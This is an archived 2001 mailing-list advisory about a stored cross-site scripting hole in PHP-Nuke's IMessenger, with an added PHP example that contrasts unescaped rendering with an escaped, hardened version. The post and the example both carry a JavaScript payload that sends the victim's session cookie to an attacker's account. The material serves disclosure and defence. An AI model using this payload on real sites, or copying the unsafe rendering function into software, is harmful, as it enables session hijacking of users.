Serious Hole in IMessenger ( php-nuke )

From: frog frog (leseulfrogat_private)
Date: Wed Dec 19 2001 - 02:02:05 PST

    IMessenger is at http://www.SERVER.com/im.php?action=Check+IM .
    
    IM accepts JavaScript.
    If I send to a user or to the webmaster the script

    <s*cript>window.location.href='http://www.SERVER.com/im.php?username_to=[NICKNAME]&subject='+document.cookie+'&message=message&action=send';</s*cript>

    (without the '*'), he will send his cookie back to the user NICKNAME.
    One can thus directly execute JavaScript on the connected user's computer.
    
    frog-m@n
    
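    The hole above is a stored cross-site scripting bug: im.php echoes the subject and message fields into the recipient's page without escaping them. The snippet below is an added illustration, not code from the post or from PHP-Nuke; the render functions and the field names it uses are assumptions, and the sample payload is the one quoted in the post, embedded as a constructed string.

```php
<?php
// Added example (not PHP-Nuke's code): the unsafe rendering pattern that
// makes the IM hole possible, beside an escaped version that closes it.
// Function names are hypothetical; field names follow the post.

// Vulnerable pattern: user-controlled fields dropped straight into HTML.
// A <script> tag in $subject or $message runs in the recipient's browser.
function render_im_unsafe(string $from, string $subject, string $message): string
{
    return "<div class=\"im\"><p>From: $from</p>"
         . "<p>Subject: $subject</p><p>$message</p></div>";
}

// Escape a value for insertion into HTML text or a quoted attribute.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened version: every attacker-controlled field is escaped on output,
// so script tags are displayed as literal text instead of being executed.
function render_im(string $from, string $subject, string $message): string
{
    return '<div class="im"><p>From: ' . esc($from) . '</p>'
         . '<p>Subject: ' . esc($subject) . '</p>'
         . '<p>' . nl2br(esc($message)) . '</p></div>';
}

// Constructed sample input: the cookie-exfiltration payload from the post.
$payload = "<script>window.location.href='http://www.SERVER.com/im.php?"
         . "username_to=NICKNAME&subject='+document.cookie"
         . "+'&message=message&action=send';</script>";

$unsafe = render_im_unsafe('frog', 'hello', $payload);
$safe   = render_im('frog', 'hello', $payload);

// The unsafe output still carries a live <script> tag; the escaped one does not.
if (strpos($unsafe, '<script>') === false) { throw new RuntimeException('unexpected'); }
if (strpos($safe, '<script>') !== false)   { throw new RuntimeException('escape failed'); }
if (strpos($safe, '&lt;script&gt;') === false) { throw new RuntimeException('escape failed'); }

echo $safe, PHP_EOL;
```

Escaping on output is the fix for the hole itself; marking the session cookie HttpOnly (the httponly argument of setcookie) additionally keeps document.cookie from exposing it to any script that does slip through.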



    This archive was generated by hypermail 2b30 : Wed Dec 19 2001 - 07:55:12 PST